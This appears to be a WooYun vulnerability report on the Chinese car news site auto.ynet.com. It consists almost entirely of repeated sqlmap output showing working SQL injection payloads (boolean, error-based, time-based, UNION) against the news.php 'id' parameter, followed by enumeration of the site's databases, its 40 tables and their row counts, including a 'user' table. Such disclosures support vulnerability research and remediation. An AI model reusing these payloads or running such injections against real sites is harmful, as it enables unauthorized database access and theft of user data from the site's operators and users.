WooYun.org

http://auto.ynet.com/cgi/newslist.php?dir=101
http://auto.ynet.com/cgi/news.php?id=532927
http://auto.ynet.com/cgi/subbrand.php?subid=44
http://auto.ynet.com/cgi/configuration.php?subid=44

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=532927 AND 8026=8026
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb)
    Type: UNION query
    Title: MySQL UNION query (22) - 28 columns
    Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
available databases [3]:
[*] foodbq
[*] information_schema
[*] web_2_1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=532927 AND 8026=8026
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb)
    Type: UNION query
    Title: MySQL UNION query (22) - 28 columns
    Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
current database:    'web_2_1'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=532927 AND 8026=8026
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb)
    Type: UNION query
    Title: MySQL UNION query (22) - 28 columns
    Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
Database: web_2_1
[40 tables]
+-----------------+
| global          |
| user            |
| article_from    |
| auto_ad         |
| auto_bang       |
| auto_beauty     |
| auto_big_brands |
| auto_bqyc       |
| auto_brands     |
| auto_cars       |
| auto_comment    |
| auto_index      |
| auto_photo      |
| auto_subbrands  |
| auto_zhuanti    |
| baojia_4s       |
| beauty_album    |
| beauty_index    |
| blank_data      |
| complain        |
| dealers         |
| fenlei          |
| fenlei_beauty   |
| friend_links    |
| index_car2013   |
| market_cars     |
| navcode         |
| navigation      |
| news            |
| news_top        |
| polymorphic     |
| sp_t28          |
| sp_t32          |
| sp_t33          |
| sp_t34          |
| sp_t35          |
| sp_t36          |
| temp            |
| tempdef         |
| tuijian_top     |
+-----------------+
Database: web_2_1
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| auto_cars       | 13346   |
| news            | 9507    |
| auto_photo      | 6252    |
| auto_subbrands  | 1522    |
| sp_t36          | 904     |
| tempdef         | 711     |
| `user`          | 446     |
| auto_beauty     | 354     |
| auto_brands     | 205     |
| auto_comment    | 150     |
| auto_big_brands | 138     |
| beauty_album    | 55      |
| baojia_4s       | 37      |
| temp            | 34      |
| fenlei          | 33      |
| dealers         | 28      |
| friend_links    | 23      |
| complain        | 20      |
| sp_t32          | 16      |
| market_cars     | 14      |
| tuijian_top     | 13      |
| auto_ad         | 9       |
| auto_zhuanti    | 9       |
| sp_t33          | 8       |
| news_top        | 5       |
| sp_t28          | 5       |
| fenlei_beauty   | 4       |
| navcode         | 3       |
| `global`        | 2       |
| article_from    | 1       |
| auto_bang       | 1       |
| auto_bqyc       | 1       |
| auto_index      | 1       |
| beauty_index    | 1       |
| blank_data      | 1       |
| index_car2013   | 1       |
| polymorphic     | 1       |
| sp_t34          | 1       |
| sp_t35          | 1       |
+-----------------+---------+